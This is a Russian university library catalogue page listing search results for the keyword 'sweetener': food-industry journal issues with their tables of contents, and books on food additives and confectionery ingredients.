Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

192 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОДСЛАСТИТЕЛЬ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
Пищевая промышленность. - Журнал, 2004г. № 5
Оглавление 
  • Тутельян, В. А. Питание и здоровье / В. А. Тутельян. - с.6-7
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Кочеткова, А. А. Соки и напитки в российской научной программе "Технологии живых систем" / А. А. Кочеткова, А. Ю. Колеснов. - с.8-11
  • Михеева, Г. А. Вкусоароматические компоненты витаминизированных напитков и киселей / Г. А. Михеева, В. М. Воробьева. - с.12-13
  • Лейн, Т. Е. Упакованный холодный чай (Ice - Tea) как перспективный продукт для российского рынка / Т. Е. Лейн. - с.14
    Кл. слова: ЧАЙ - ТОРГОВЛЯ, Чай холодный
  • Шулбаева, М. Т. Сохранение традиционных качеств пищевых продуктов при использовании пищевых волокон / М. Т. Шулбаева, К. Л. Коновалов. - с.16-17
  • Использование люпиновой муки при изготовлении макаронных изделий / ; Е. В. Петрова, Н. К. Казеннова, А. А. Глазунов, Т. И. Шнейдер. - с.18-20
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, мука люпиновая
  • Росляков, Ю. Ф. Цветокорректирующие добавки для макаронных изделий профилактического действия / Ю. Ф. Росляков, И. И. Уварова, Н. А. Шмалько. - с.21
  • Беспалов, В. В. Витаминно-минеральный премикс "Флагман" для обогащения хлебобулочных изделий / В. В. Беспалов. - с.22
  • Журавко, Е. В. Мука зародышей пшеницы для производства функциональных продуктов питания / Е. В. Журавко, Е. В. Грузинов, Е. И. Кострова. - с.23
  • Коновалов, К. Л. Микрокристаллическая целлюлоза в мясопродуктах / К. Л. Коновалов. - с.24
  • Рисовые продукты для консервов здорового питания / ; З. А. Троян, Л. В. Лычкина, Н. Н. Корастилева, С. Ю. Жажский. - с.25
  • Подкорытова, А. В. Морские водоросли - уникальное сырье для обогащения продуктов питания / А. В. Подкорытова. - с.27
    Кл. слова: ВОДОРОСЛИ МОРСКИЕ
  • Карагодин, В. П. Истинные и мнимые свойства БАД глазами экспертов / В. П. Карагодин, Р. М. Салимов, А. Н. Орехов. - с.29-31
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Михалев, А. А. Состояние и перспективы развития агропромышленного рынка России / А. А. Михалев. - с.32-34
  • Козин, Е. Б. Пообъектное формирование затрат / Е. Б. Козин, Т. А. Козина, Л. И. Шпилев. - с.36-37
    Кл. слова: ЗАТРАТЫ - предприятие пищевое
  • Маламуд, Д. Б. Теоретические основы создания устойчивого экономического развития / Д. Б. Маламуд. - с.38-40
  • Жапаров, К. Ж. Конкурентоспособность агропродукции Республики Казахстан / К. Ж. Жапаров. - с.41
  • Большаков, О. В. Методы сравнительной оценки функционирования научных организаций АПК / О. В. Большаков, Я. Г. Гараев, В. Г. Киселев. - с.42-45
  • Минаева, Е. В. Методы управления производством зерна в развитых странах мира / Е. В. Минаева, А. С. Чижик. - с.46-47
    Кл. слова: ЗЕРНО - производство
  • Чубенко, Н. Т. Хлебопекарная промышленность России в 1980-1990 годы / Н. Т. Чубенко. - с.48-49
  • Тужилкин, В. И. Дополнительное профессиональное образование возраждается / В. И. Тужилкин, В. С. Сергунов. - с.50-51
    Кл. слова: ОБРАЗОВАНИЕ ДОПОЛНИТЕЛЬНОЕ, ОБРАЗОВАНИЕ ПРОФЕССИОНАЛЬНОЕ, ПЕРЕПОДГОТОВКА преподавателей
  • Зелинский, Г. С. Технические регламенты на производство хлебопродуктов / Г. С. Зелинский. - с.52
  • Новожилова, О. А. Эксплуатация и обслуживание прачечного оборудования на предприятиях пищевой промышленности / О. А. Новожилова. - с.62-63
    Кл. слова: ОБОРУДОВАНИЕ ПРОМЫШЛЕННОЕ, Оборудование прачечное
  • Хода, Е. Г. Вакуумная упаковка пищевых продуктов в стеклянную тару системы "твист-офф" / Е. Г. Хода, Е. М. Тихонова. - с.70-71
    Кл. слова: ТАРА стеклянная
  • Чулюков, О. Г. Технологический контроль качества молочной продукции методом ближней инфракрасной спектроскопии / О. Г. Чулюков, . М. Кузьмичева, В. Г. Блиадзе. - с.76-77
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ, ПРОДУКЦИЯ молочная
  • Проселков, В. Г. Российская система ХАССП: внедрение и сертификация / В. Г. Проселков. - с.80-81
  • Силаев, А. В. Низкокалорийный подсластитель. Вопросы практического применения в пищевой промышленности / А. В. Силаев, И. В. Тихонова, Ю. Г. Сметанина. - с.88-90
  • Беличенко, А. М. Союз производителей безалкогольных напитков / А. М. Беличенко. - с.104
  • Антонов, А. А. Союз предприятий холодильной промышленности / А. А. Антонов. - с.105
  • Российской академии сельскохозяйственных наук - 75 лет. - с.107
Держатели документа (Информация об экземплярах) 
2. 
Хранение и переработка сельхозсырья. - Журнал, 2010г. № 12
Оглавление 
  • Математическое обоснование в соотношении динамик показателей баланса для обеспечения снижения импорта продукта - экструдата на ближайший прогнозный период. - с.8-10
  • Давыдов, С. А. Экспорт муки как одно из основных направлений увеличения коэффициента использования мукомольных мощностей / С. А. Давыдов. - с.10-13
  • Краснов, А. Е. Оценка эффективности инвестиций и целесообразности внедрения когенерационных установок в пищевой промышленности / А. Е. Краснов, И. В. Куликова. - с.13-15
  • Филатов, В. В. Анализ методов инфракрасной спектрометрии для определения оптических характеристик капиллярно-пористых материалов / В. В. Филатов. - с.16-21
  • Исследование процесса рафинации форпрессового хлопкового масла. - с.21-23
  • Гнездилова, А. И. Влияние некоторых параметров на кинетику кристаллизации лактозы / А. И. Гнездилова, Ю. В. Виноградова. - с.24-26
  • Дранников, А. В. Исследование процесса теплообмена при сушке свекловичного жома перегретым паром в активном гидродинамическом режиме / А. В. Дранников. - с.26-29
  • Голубева, Л. В. Методика определения растворимости сухих молочных продуктов на основе кондуктометрических измерений / Л. В. Голубева, С. А. Титов, Н. П. Довгун. - с.30-32
  • Зангиева, Б. Г. Стевия - натуральный низкокалорийный подсластитель / Б. Г. Зангиева, В. Б. Цугкиева, Б. Г. Цугкиев. - с.32-34
  • Гуць, В. С. Исследование адгезии термостабильных начинок для мучных изделий / В. С. Гуць, А. А. Кирьянова, И. Л. Корецкая. - с.34-36
  • Глаголева, Л. Э. Сорбционные свойства пищевых волокон вторичных продуктов переработки растительного сырья в молочно-белковых пищевых системах / Л. Э. Глаголева, Н. С. Родионова, Н. П. Зацепилина. - с.36-38
  • Влияние формы связи влаги фаршевых систем на основе различного рыбного сырья методом DTA. - с.39-41
  • Дзадзиева, М. С. Ягоды лаконоса костянкового и лаконоса американского - источники красящих веществ / М. С. Дзадзиева, Б. Г. Цугкиев. - с.41-43
  • Юдин, А. Ю. Жировые продукты при приготовлении хлебобулочных изделий из пшеничной муки высшего сорта / А. Ю. Юдин, Ю. М. Феофанова, Е. Е. Дудник. - с.43-47
  • Тагиров, Х. Х. Качественные показатели мясной продуктивности чистопородных и помесных бычков / Х. Х. Тагиров, И. Н. Губайдуллин, Р. Ш. Давлетов. - с.47-48
  • Артюхова, С. И. Использование лактитола в технологии производства биопродукта / С. И. Артюхова, Ю. А. Гаврилова. - с.49-50
  • Талибова, А. Г. Исследование стабильных изотопов для оценки качества и безопасности пищевых продуктов / А. Г. Талибова, А. Ю. Колеснов. - с.51-55
  • Бессонова, Л. П. Управление рисками на предприятиях по производству и переработке зерна / Л. П. Бессонова, В. И. Манжесов. - с.55-57
  • Куликова, И. В. Актуальность создания системы мониторинга качества зерна / И. В. Куликова, А. Е. Краснов, О. Е. Щербакова. - с.58-59
  • Ахатова, И. А. Использование сухого кобыльего молока при производстве йогурта / И. А. Ахатова, С. Г. Канарейкина. - с.60-62
  • Причко, Т. Г. Оценка сырьевых источников функциональных ингридиентов для продуктов профилактического назначения / Т. Г. Причко, И. А. Мачнева, В. Т. Кондратов. - с.63-65
  • Брыкалов, А. В. Переработка соломистых отходов гриба вешенки / А. В. Брыкалов, Е. С. Романенко, О. В. Шарипова. - с.66
  • Камышева, И. М. Использование продуктов переработки семян амаранта / И. М. Камышева. - с.67-71
Держатели документа (Информация об экземплярах) 
3. 
Пищевая промышленность. - Журнал, 2005г. № 5
Оглавление 
  • Нечаев, А. Пищевые ингредиенты вчера, сегодня, завтра / А. Нечаев. - с.6-9
  • Смирнов, Е. В. Пищевые ароматизаторы / Е. В. Смирнов. - с.10-15
  • Шайдуллина, Г. М. Хромато-масс-спектрометрический анализ при производстве ароматообразующих композиций с использованием эфирных масел мяты / Г. М. Шайдуллина. - с.16-19
  • Матвеева, И. В. Концепция и технологические решения применения хлебопекарных улучшителей / И. В. Матвеева. - с.20-24
  • Красильников, В. Н. Современный ассортимент лецитинов как пищевых добавок / В. Н. Красильников, Е. Б. Федорова, Ю. А. Тимошенко. - с.24-27
  • Шубина, О. Г. Полидекстроза - многофункциональный углевод для создания низкокалорийных и обогащенных продуктов / О. Г. Шубина. - с.28-31
  • Бакулина, О. Н. Комплексная переработка овощей и фруктов в ингредиенты для современных пищевых технологий / О. Н. Бакулина. - с.32-34
  • Степанова, Л. И. Жировые системы "СОЮЗ" - перспективно, выгодно, технологично / Л. И. Степанова, П. Б. Матвеев, С. В. Почерников. - с.40-41
    Кл. слова: МАСЛО РАСТИТЕЛЬНОЕ, ЖИР РАСТИТЕЛЬНЫЙ
  • Генетически немодифицированная соевая мука из Сербии. - с.42
    Кл. слова: МУКА соевая
  • Драгун, Т. Cargill-Cerestar: использование нашего опыта в технологиях здорового питания / Т. Драгун, Ф. Броунс. - с.44-46
  • Ван, Моурик С. В. Современные тенденции применения интенсивных подсластителей в пищевых продуктах / ; С. В. Ван Моурик. - с.48-50
    Кл. слова: ПОДСЛАСТИТЕЛЬ
  • Егорова, М. И. Разработка ассортимента сахара / М. И. Егорова, Л. И. Беляева, Л. С. Чугунова. - с.52-53
  • Заменитель сахара ИЗОМАЛЬТ в пищевых продуктах. - с.54-55
  • Мальтит для производства низкокалорийных изделий. - с.56
  • Полянский, К. К. Стевия в продуктах целебно-профилактического назначения / К. К. Полянский, Г. К. Подпоринова, Д. М. Богомолов. - с.58
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-март 2005 г.. - с.70-71
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ - СТА
  • Дасковский, В. Б. Актуальность и условия перехода к инновационному развитию промышленности / В. Б. Дасковский, В. Б. Киселев, А. В. Монахов. - с.72-73
  • Шевцова, В. Н. Оценка и прогнозирование инвестиционной привлекательности отрасли / В. Н. Шевцова. - с.74-75
  • Седов, В. Ю. Сепараторы, декантеры и технологические линии для производства пищевого жира / В. Ю. Седов. - с.80-81
    Кл. слова: ЖИР ПИЩЕВОЙ - ПРОИЗВОДСТВО
  • Нариниянц, Г. Р. Современные способы заготовки жидких и пюреобразных продуктов / Г. Р. Нариниянц, М. Д. Федоров. - с.103-104
  • Батурин, А. К. Питание и здоровье: проблемы XXI века / А. К. Батурин, Г. И. Мендельсон. - с.105-107
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Серебрякова, Т. Г. Сельскохозяйственное сырье и качество пищевой продукции / Т. Г. Серебрякова. - с.108-109
    Кл. слова: СЫРЬЕ сельскохозяйственное
Держатели документа (Информация об экземплярах) 
4. 
Пищевая промышленность. - Журнал, 2005г. № 7
Оглавление 
  • Загорский, А. Л. Рынок этикеточной продукции и влияние интегрированных бизнес-групп / А. Л. Загорский. - с.8-11
    Кл. слова: ЭТИКЕТКА
  • Федотова, О. Б. О герметичности упаковки и методах ее контроля / О. Б. Федотова. - с.12-13
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь - май 2005 года. - с.34-35
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ, ПРОМЫШЛЕННОСТЬ ПЕРЕРАБАТЫВАЮ
  • Алексейчева, Е. Ю. Интеграция предприятий как фактор обеспечения конкурентоспособности / Е. Ю. Алексейчева. - с.42-44
    Кл. слова: ИНТЕГРАЦИЯ ПРЕДПРИЯТИЙ, КЛАСТЕРИЗАЦИЯ
  • Мануйлова, Т. А. Анализ техногенного влияния отраслей промышленности РФ на окружающую среду / Т. А. Мануйлова, Н. Ф. Панков. - с.50-52
    Кл. слова: ПРОМЫШЛЕННОСТЬ - ЭКОЛОГИЯ
  • Дебабов, В. Г. Экологичные биофабрики / В. Г. Дебабов. - с.60-62
    Кл. слова: БИОТЕХНОЛОГИЯ, РАСТЕНИЯ ТРАНСГЕННЫЕ, промышленность микробиологическая
  • Бень, Л. Б. Тенденции российского законодательства в области маркировки ГМИ / Л. Б. Бень. - с.20-21
    Кл. слова: ПРОДУКТЫ ГЕНЕТИЧЕСКИ МОДИФИЦ
  • Подпоринова, Г. К. Изучение химического состава стевии / Г. К. Подпоринова, Н. Д. Верзилина, К. К. Полянский. - с.68
  • Лукашевич, О. Н. SWETA - натуральный подсластитель нового поколения / О. Н. Лукашевич, Т. Соманн. - с.64-66
  • Функциональные мясо-растительные продукты / ; С. К. Тамкович, Н. М. Степанищева, Н. Е. Посокина, Л. И. Кизим. - с.77
  • Костылева, О. Ф. Техническое регулирование в области производства и оборота пищевых продуктов / О. Ф. Костылева. - с.78-79
    Кл. слова: РЕГУЛИРОВАНИЕ ТЕХНИЧЕСКОЕ
  • Проселкова, В. Г. Взаимосвязь подтверждения соответствия продукции и сертификации систем качества и производств / В. Г. Проселкова. - с.80-84
    Кл. слова: МЕНЕДЖМЕНТ КАЧЕСТВА
  • Шнейдер, Д. В. Обеспечение безопасности макаронных изделий быстрого приготовления / Д. В. Шнейдер. - с.85
Держатели документа (Информация об экземплярах) 
5. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2006г. № 2
Оглавление 
  • Андреенкова, В. А. Мясные продукты с увеличенным сроком годности / В. А. Андреенкова, Л. В. Алехина, Е. В. Мансветова. - с.16-17
  • Шубина, О. Г. Пищевые ингредиенты как замена сахара / О. Г. Шубина. - с.24-27
    Кл. слова: ПОДСЛАСТИТЕЛЬ, САХАРОЗАМЕНИТЕЛЬ
  • Макинтайр, М. Ингредиенты и анализ пищевых продуктов / М. Макинтайр. - с.28-29
  • Моурик, С. В. ван "Аспасвит": 10 лет мы делаем жизнь слаще! / С. В. ван Моурик. - с.30-31
  • Кузнецова, Л. С. Новое поколение комплексных добавок для антимикробной защиты мясной продукции / Л. С. Кузнецова, Н. В. Михеева. - с.32-33
  • Доценко, Е. В. Жиры - альтернативы масла какао для кондитерской промышленности, поставляемые компанией "Масло база" / Е. В. Доценко. - с.36
  • Бок, С. Дифференцирование через инновацию / С. Бок. - с.38-40
    Кл. слова: ПРОДУКТ ПИЩЕВОЙ ИННОВАЦИОННЫЙ
  • Смирнов, Е. В. Композиционные ароматизаторы / Е. В. Смирнов. - с.42-46
  • Капрельянц, Л. В. Ферменты в пищевых технологиях: вчера, сегодня, завтра / Л. В. Капрельянц. - с.48-51
  • Дик, Э. Желатин: свойства, особенности, функции / Э. Дик, Е. В. Овсянникова. - с.52-57
  • Векуа, Дж. "Путешествие в мир Вкуса и Аромата" / Дж. Векуа. - с.58-59
    Кл. слова: АРОМАТИЗАТОР
  • Бакланов, А. А. Дрожжевые экстракты DSM. Новые тенденции и мировой опыт / А. А. Бакланов. - с.60-61
  • Тимошенко, Ю. А. ЛециПРО - новый бренд растительных лецитинов / Ю. А. Тимошенко, Е. Б. Федорова, А. В. Гудзь. - с.62-63
  • Рыжова, Н. В. Современные натуральные красители / Н. В. Рыжова. - с.64
  • Молин, Р. Технологические ароматизаторы / Р. Молин, Я. Панек. - с.66-67
  • Панфилова, М. Н. Ксантановая камедь. Преимущества и особенности применения / М. Н. Панфилова. - с.70
  • Амерханова, А. М. Пробиотики и пребиотики для продуктов функционального питания / А. М. Амерханова. - с.74-75
  • Николэй, К. Для хорошего самочувствия просто добавьте пребиотики! / К. Николэй. - с.76-77
  • Рогов, И. А. Нанотехнология биопрепарата "Милканг" на основе глубокой переработки молочного сырья / И. А. Рогов, Е. И. Титов, Н. А. Тихомирова. - с.78-80
Держатели документа (Информация об экземплярах) 
6. 
Вопросы питания. - Журнал, 2009г. № 2
Оглавление 
  • Нанотехнологии в пищевых производствах: перспективы и проблемы. - с.4-17
    Кл. слова: НАНОМАТЕРИАЛ, БИОДОСТУПНОСТЬ, БИОБЕЗОПАСНОСТЬ
  • Ускова, М. А. Антиоксидантные эффекты молочнокислых бактерий - пробиотиков и йогуртовых заквасок / М. А. Ускова, Л. В. Кравченко. - с.18-23
    Кл. слова: ПРОБИОТИКИ, БАКТЕРИИ молочнокислые, антиоксиданты
  • Медико-биологическая оценка безопасности генно-инженерно-модифицированной кукурузы линии MIR604. - с.24-32
    Кл. слова: КУКУРУЗА генно-модифицированная, MIR 604
  • Токаев, Э. С. Разработка нового синбиотического пищевого продукта с высоким содержанием бифидобактерий / Э. С. Токаев, А. А. Максимов. - с.39-41
    Кл. слова: экстракт дрожжевой, БИФИДОБАКТЕРИЯ
  • Влияние плесневых грибов, потребляемых с пищей, на кишечную микрофлору у крыс. - с.42-46
    Кл. слова: МИКРОФЛОРА
  • Активность пищеварительных ферментов у потомства крыс, получавших во время лактации рацион, контаминированный тяжелыми металлами. - с.47-50
    Кл. слова: ЛАКТАЦИЯ, МЕТАЛЛЫ ТЯЖЕЛЫЕ
  • Конденцова, В. М. О рекомендуемых нормах потребления витаминов A, E, C и B2 / В. М. Конденцова, О. А. Вржесинская. - с.51-56
    Кл. слова: ВИТАМИНЫ - ПИТАНИЕ
  • Влияние гипокалорийной диеты, обогащенной биологически активными веществами c антиоксидантным действием, на клинико-метаболические показатели у больных сахарным диабетом типа 2. - с.57-62
    Кл. слова: ДИАБЕТ САХАРНЫЙ, АНТИОКСИДАНТЫ, ДИЕТА ГИПОКАЛОРИЙНАЯ
  • Коркин, А. Л. Влияние празиквантела и препарата, содержащего урсодезоксихолевую кислоту, на литогенные свойства желчи у больных с опистархозом на фоне основного варианта стандартной диеты / А. Л. Коркин. - с.63-66
    Кл. слова: опистархоз, КИСЛОТА урсодезоксихолевая
  • Вировец, О. А. О повышенных потерях макро- и микроэлементов при занятии спортом и целесообразности их компенсации биологически активными добавками / О. А. Вировец. - с.67-72
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА, СПОРТ - питание
  • Теоретические предпосылки к разработке индивидуального питания спортсменов. - с.73-76
    Кл. слова: СПОРТ - ПИТАНИЕ
  • Макаров, В. Н. Получение низкокалорийных фруктовых компотов с применением натуральных подсластителей / В. Н. Макаров. - с.77-78
    Кл. слова: КОМПОТ, ПОДСЛАСТИТЕЛЬ натуральный
Держатели документа (Информация об экземплярах) 
7. 
Молочная промышленность. - Журнал, 2010г. № 7
Оглавление 
  • Радаева, И. А. Ведущие ученые отрасли: Богданов Вячеслав Михайлович / И. А. Радаева. - с.80
  • К юбилею ведущего маслодела России. - с.74-75
  • Дунченко, Н. И. Научно-исследовательская работа - одна из основных составляющих подготовки магистров / Н. И. Дунченко, Л. В. Калинина, А. В. Ионов. - с.72-73
  • Пасько, О. В. Социальная значимость и экономическая эффективность технологий ферментированных продуктов / О. В. Пасько. - с.70-71
  • Быстрозамороженная творожная запеканка. - с.69
  • Степанов, К. М. Якутские национальные кисломолочные продукты нового поколения / К. М. Степанов, В. Т. Васильева. - с.68
  • Глаголева, Л. Э. Формы связи влаги в продуктах на творожной основе / Л. Э. Глаголева, Н. Ю. Черноусова, Л. С. Просвирина. - с.66-67
  • Количество в кефире полисахарида, производимого молочнокислыми бактериями. - с.64-65
  • Ермолаев, В. А. Вакуумное концентрирование молочно-белковых продуктов / В. А. Ермолаев. - с.62-63
  • Красноштанова, А. А. Молекулярное распределение белков при ультраконцентрировании сыворотки / А. А. Красноштанова, В. Г. Попов, О. В. Рытченкова. - с.60-61
  • Гиринович, О. А. Семинар "ЭФКО": фокус на творожную продукцию / О. А. Гиринович. - с.58-59
  • Смирнова, И. А. Молочно-белковый концентрат / И. А. Смирнова, В. Н. Печерина. - с.57
  • Мельникова, Е. И. Имитатор молочного жира для синбиотических продуктов / Е. И. Мельникова, Е. Б. Станиславская, Н. А. Подгорный. - с.55-56
  • Куликова, И. К. Кисломолочный напиток смешанного брожения / И. К. Куликова, И. А. Евдокимов, М. А. Гашева. - с.53-54
  • Тагатозосодержащий подсластитель. - с.52
  • Кравченко, Э. Ф. Белковые структурообразователи - загустители / Э. Ф. Кравченко, В. П. Захлестных. - с.51
  • Евелева, В. В. Добавки для йогурта / В. В. Евелева, А. Л. Рублев, Л. А. Забодалова. - с.48-50
  • Соколенко, Г. Г. Сывороточный квас с экстрактом амаранта / Г. Г. Соколенко, К. К. Полянский, Т. В. Вострикова. - с.46-47
  • Электродиализные установки для переработки молочной сыворотки. - с.45
  • Бурцев, Д. Г. Концентрат "КПС - лакт" / Д. Г. Бурцев, А. Д. Лодыгин. - с.44
  • Бурцев, Д. Г. Бифидогенный концентрат "Лактобел" / Д. Г. Бурцев, В. Н. Чернобаев. - с.43
  • Дудникова, О. А. Липидно-белковый концентрат / О. А. Дудникова, А. Д. Лодыгин, А. Г. Храмцов. - с.42-43
  • Храмцов, А. Г. Модернизация молочного дела: продвижение инновационных приоритетов / А. Г. Храмцов. - с.38-41
  • Комментарии к Типовой технологической инструкции по стандарту на молоко и сливки сгущенные с сахаром. - с.34-36
  • Пасько, О. В. Активизация роста и защиты культур с пробиотическими свойствами / О. В. Пасько. - с.31-32
  • Арсеньева, Т. П. К чему приводит лактазная недостаточность / Т. П. Арсеньева. - с.28-30
  • Хамагаева, И. С. Внеклкеточные метаболиты, синтезируемые пробиотическими микроорганизмами / И. С. Хамагаева, С. Б. Тумунова, Н. А. Замбалова. - с.27
  • Влияние лактитола на сквашивание и антагонистическую активность молочнокислых микроорганизмов. - с.24-26
  • Производители "Бифилайф" - лидеры молочной промышленности. - с.23
  • Ефимочкина, Н. Р. Возбудители пищевых зоонозов / Н. Р. Ефимочкина. - с.20-22
  • В помощь микробиологу. - с.18
  • Миллер, М. "Прозрачное молоко" на предприятии TNUVA / М. Миллер, М. Полыновская. - с.16-17
  • Имидж розничных сетей России глазами покупателей. - с.13-14
  • Быковская, Г. В. Как можно стабилизировать цены на молоко / Г. В. Быковская. - с.9-12
  • Потенциальные возможности и перспективы развития рынка молока и молочных продуктов в России. - с.6-8
Держатели документа (Информация об экземплярах) 
8. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
9. 
Исупов В. П. Пищевые добавки и пряности [Текст] : История, состав и применение / В. П. Исупов, 2000. - 166,[3] с.
Оглавление 
  • СанПиН 2.3.2.560-96. Список пищевых добавок, разрешенных к применению при производстве пищевых продуктов. - с.150-167
Держатели документа (Информация об экземплярах) 
10. 
Голубев В. Н. Пищевые и биологически активные добавки [Текст] : Учеб. для студ. вузов / В. Н. Голубев, Л. В. Чичева-Филатова,Т. В. Шленская, 2003. - 201 с.
Держатели документа (Информация об экземплярах) 
11. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
12. 
Иванова, Людмила Афанасьевна. Пищевая биотехнология [Текст] : учеб. пособие для вузов по специальности 240902 "Пищевая биотехнология". Кн. 2 : Переработка растительного сырья, 2008. - 471, [1] с.
Держатели документа (Информация об экземплярах) 

Обобщены наиболее значимые достижения в области создания пищевых биотехнологий, используемых в нашей стране и за рубежом при переработке растительного сырья. Рассмотрены цели и задачи общей и пищевой биотехнологии, агенты, субстраты и методы биотехнологии, основы биотехнологических процессов. Приведены общие сведения о ферментных препаратах и возможностях их использования в различных отраслях пищевой промышленности. Особое внимание уделено технологии и использованию добавок пищевых и биологически активных веществ, полученных биотехнологическими методами, в производстве современных продуктов питания, а также технологическим особенностям переработки разнообразного растительного сырья с применением микроорганизмов и продуктов их метаболизма.

13. 
Сборник материалов II Торгового форума Сибири [Текст] / Правительство Ом. обл., Координац. совет по торговле и потребит. рынку межрегионал. ассоц. "Сибирское соглашение", Ом. гос. ин-т сервиса, Рос. экон. ун-т им. Г. В. Плеханова, Ом. ин-т (фил.), Торгово-пром. палата Ом. обл., 2013. - 417 с.
Ключевые слова 
КОРПОРАТИВНОЕ -- УПРАВЛЕНИЕ -- СОЦИАЛЬНЫЙ -- АУДИТ -- КООПЕРАЦИЯ -- КЛАСТЕР -- КОРПОРАЦИЯ -- ЧЕЛОВЕЧЕСКИЙ -- ПОТЕНЦИАЛ -- КОММУНИКАЦИЯ -- БАНКОВСКИЙ -- МАРКЕТИНГ -- ПРОДАЖА -- КОНСОЛИДИРОВАННЫЙ -- БЮДЖЕТ -- КОРПОРАТИВНАЯ -- КУЛЬТУРА -- БИЗНЕС -- УДАЛЕННАЯ -- РОССИЯ -- ФИНАНСИРОВАНИЕ -- ПУШНОЙ -- ЭКОНОМИЧЕСКИЙ -- КРИЗИС -- ИННОВАЦИОННАЯ -- ЭКОНОМИКА -- ВНЕШНЕЭКОНОМИЧЕСКАЯ -- ДЕЯТЕЛЬНОСТЬ -- ОМСКАЯ -- ОБЛАСТЬ -- ИНВЕСТИЦИЯ -- ЛИЗИНГ -- ОТЧЕТНОСТЬ -- ОРГАНИЗАЦИЯ -- ВТО -- СЕЛЬСКИЙ -- ТУРИЗМ -- ФАНДРАЙЗИНГ -- ПРОСЬЮМЕРСТВО -- КАЧЕСТВО -- ЭКСПЕРТИЗА -- ЗАЩИТА -- ПРАВО -- ПОТРЕБИТЕЛЬ -- ПОТРЕБИТЕЛЬСКАЯ -- КООПЕРАЦИЯ -- УЧЕТНАЯ -- ПОЛИТИКА -- СЕРТИФИКАЦИЯ -- КВАЛИФИКАЦИЯ -- ВЫПУСКНИК -- ЯЗЫКОВАЯ -- КОМПЕТЕНЦИЯ -- ИМИТАЦИОННОЕ -- МОДЕЛИРОВАНИЕ -- СТИМУЛИРОВАНИЕ -- ТРУД -- ПЕРСОНАЛ -- КАДРЫ -- ЛИДЕР -- ПРОДАКТ -- ПЛЕЙСМЕНТ -- КРЕАТИВНЫЙ -- ИННОВАЦИОННЫЙ -- ТОВАР -- ИТ -- АУТСОРСИНГ -- БРЕНД -- РОЗНИЧНАЯ -- ТУРИСТИЧЕСКАЯ -- МЕРЧЕНДАЙЗИНГ -- ПЕРСОНАЛЬНЫЕ -- ДАННЫЕ -- НЕЙРОМАРКЕТИНГ -- КОНКУРЕНТОСПОСОБНОСТЬ -- ТОВАРНЫЙ -- АССОРТИМЕНТ -- EVENT -- ОПТОВАЯ -- СПОРТИВНЫЙ -- 